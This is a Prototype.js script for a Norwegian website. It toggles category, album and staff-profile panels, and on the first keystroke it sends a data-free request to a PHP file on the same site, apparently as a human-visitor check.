document.observe('keyup', function(e){ 
 var oBody = $$('body')[0];
 if(oBody.readAttribute('hm') != '1'){ 
  var surl = 'http://www.swsnorge.no/include/xyqwtbrwoi.php';  
  new Ajax.Request(surl, {
    onSuccess: function(resp){     
     oBody.writeAttribute("hm", "1");
    }   
  });
 }
});

document.observe('dom:loaded',function(){     

     $$('.category').each(

      function(oAnchor) {               

        oAnchor.observe('click', toggleVisible2.bindAsEventListener(oAnchor));

      }    

     );   

    

    if($('per_arne_box')){

     $('per_arne_box').observe('mouseover', show_me);

     $('per_arne_box').observe('mouseout', hide_me);

    }

    if($('thore_box')){

     $('thore_box').observe('mouseover', show_me2);

     $('thore_box').observe('mouseout', hide_me2);

    } 

    if($('kari-anne_box')){

     $('kari-anne_box').observe('mouseover', show_me3);

     $('kari-anne_box').observe('mouseout', hide_me3);

    } 

    

      

});



function show_me(){

  $('per_arne').show();

}



function hide_me(){

$('per_arne').hide();

}



function show_me2(){

  $('thore').show();

}



function hide_me2(){

$('thore').hide();

}

function show_me3(){

  $('kari-anne').show();

}



function hide_me3(){

$('kari-anne').hide();

}





function toggleVisible2 (e){

  var objBtn = $(this);

  if(objBtn.readAttribute('id') == 'albums'){ 

   $('album').show();  

   $('pag').hide();

   $('basic').hide();

  }else{

    $('album').hide();  

    $('pag').show();

    $('basic').show();

  }



}

function toggleVisible (e)

 {



  var objBtn = $(this);

  if(objBtn.readAttribute('id') == 'cat1'){   

   $('cat_2').hide();

   $('cat_3').hide();

   $('cat_4').hide();

   $('cat_5').hide();

   $('cat_1').show();

   $('album').hide();

  }else if(objBtn.readAttribute('id') == 'cat2'){   

   $('cat_1').hide();

   $('cat_3').hide();

   $('cat_4').hide();

   $('cat_5').hide();

   $('cat_2').show();

   $('album').hide();

  }else if(objBtn.readAttribute('id') == 'cat3'){   

   $('cat_2').hide();

   $('cat_1').hide();

   $('cat_4').hide();

   $('cat_5').hide();

   $('cat_3').show();

   $('album').hide();

  }else if(objBtn.readAttribute('id') == 'cat4'){   

   $('cat_2').hide();

   $('cat_1').hide();

   $('cat_3').hide();

   $('cat_5').hide();

   $('cat_4').show();

   $('album').hide();

  }else if(objBtn.readAttribute('id') == 'cat5'){   

   $('cat_2').hide();

   $('cat_1').hide();

   $('cat_3').hide();

   $('cat_4').hide();

   $('cat_5').show();

   $('album').hide();

  }else if(objBtn.readAttribute('id') == 'albums'){

   $('cat_2').hide();

   $('cat_1').hide();

   $('cat_3').hide();

   $('cat_4').hide();

   $('cat_5').hide();

   $('pag').hide();

   $('basic').hide();

   $('album').show();

  }

  /*

  var varTarget = objBtn.readAttribute('target');



  if (! varTarget) { varTarget='' };



  var varHref = objBtn.readAttribute('href');

  

  if (varTarget == '_blank' || varTarget == '_new') {

    window.open(varHref);

  }   



  if (varTarget == '' || varTarget == '_top' || varTarget=='_self') {

   document.location.href=varHref;

  }

*/

  Event.stop(e);



}
